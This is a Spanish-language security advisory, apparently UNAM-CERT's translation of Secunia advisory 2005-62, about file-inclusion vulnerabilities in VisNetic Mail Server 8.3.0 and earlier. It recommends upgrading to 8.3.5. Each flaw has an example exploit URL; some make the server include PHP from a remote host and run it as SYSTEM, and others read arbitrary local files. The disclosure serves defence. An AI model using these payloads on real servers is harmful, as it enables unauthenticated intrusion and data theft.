Se reportaron varias vulnerabilidades en VisNetic Mail Server, que pueden explotarse para mostrar información sensible y comprometer un sistema vulnerable.
Secunia Research Advisory
2005-62
VisNetic Mail Server | <= | 8.3.0 |
Secunia Research reportó varias vulnerabilidades en VisNetic Mail Server, que pueden explotarse por personas maliciosas para mostrar información sensible y comprometer un sistema vulnerable.
Los servicios webmail y webadmin corren con PHP configurado con "register_global" habilitado. Las variables "language" y "lang_settings" en "/accounts/inc/include.php" y "/admin/inc/include.php" no son inicializadas apropiadamente cuando se accesa a los scripts de forma directa. Esto hace posible sobrescribir las variables ocasionando que los scripts incluyan archivos PHP arbitrarios de fuentes locales y remotas.
Ejemplo: http://[host]:32000/accounts/inc/include.php-language=0&lang_settings[0][1]=http://[host]/ http://[host]:32000/admin/inc/include.php-language=0&lang_settings[0][1]=http://[host]/
Una explotación exitosa permitirá la ejecución de código arbitrario PHP dentro de un servidor vulnerable con privilegios SYSTEM sin que requiera autenticación.
La entrada que se pasa al párametro "lang" dentro de "/dir/include.html" no es validada apropiadamente antes de utilizarse para incluir archivos. Esto puede explotarse para agregar archivos arbitrarios desde fuentes locales y externas.
Ejemplo: http://[host]:32000/dir/include.html-lang=[file]%00
Una explotación exitosa permitirá mostrar archivos arbitrarios dentro de un servidor vulnerable sin requerir autenticación.
La entrada que se pasa al parámetro "language" dentro de "/mail/settings.html" no es validada apropiadamente antes de ser guardada en la base de datos. Esto puede explotarse en conjunto con la sobrescritura de la variable "lang_settings" para incluir scripts PHP arbitrarios desde fuentes locales y externas.
Ejemplo: http://[host]:32000/mail/settings.html-id=[current_id]&Save_x=1&language=TEST http://[host]:32000/mail/index.html-id=[current_id]&lang_settings[TEST]=test;http://[host]/;
Una explotación exitosa permitirá la ejecución de scripts PHP arbitrarios dentro de un servidor vulnerable con privilegios SYSTEM pero requiere atentificarse.
Las variables "default_layout" y "layout_settings" no son inicializadas cuando "/mail/include.html" encuentra una cadena HTTP_USER_AGENT que no reconoce. Esto puede explotarse en conjunto con la sobrescritura de las variables "default_layout" y "layout_settings" para mostrar el contenido de archivos locales.
Ejemplo(utilizando un navegador non-IE/Mozilla/Firefox ): http://[host]:32000/mail/index.html-/mail/index.html-default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2
Una explotación exitosa permitirá mostrar archivos arbitrarios dentro de un servidor vulnerable sin requerir atenticación.
Las vulnerabilidades se confirmaron en la versión 8.3.0. Versiones anteriores también podrían ser afectadas.
Exposición de información sensible.
Acceso al sistema.
Actualizar a la versión 8.3.5.
http://www.deerfield.com/download/visnetic-mailserver/
La Coordinación de Seguridad de la Información/UNAM-CERT agradece el apoyo en la elaboración ó traducción y revisión de éste Documento a:
UNAM-CERT
Equipo de Respuesta a Incidentes UNAM
Coordinación de Seguridad de la Información
incidentes at seguridad.unam.mx
phishing at seguridad.unam.mx
http://www.cert.org.mx
http://www.seguridad.unam.mx
ftp://ftp.seguridad.unam.mx
Tel: 56 22 81 69
Fax: 56 22 80 47
Aviso legal |
Créditos |
Staff |
Administración
Copyright © Todos los derechos reservados
UNAM - CERT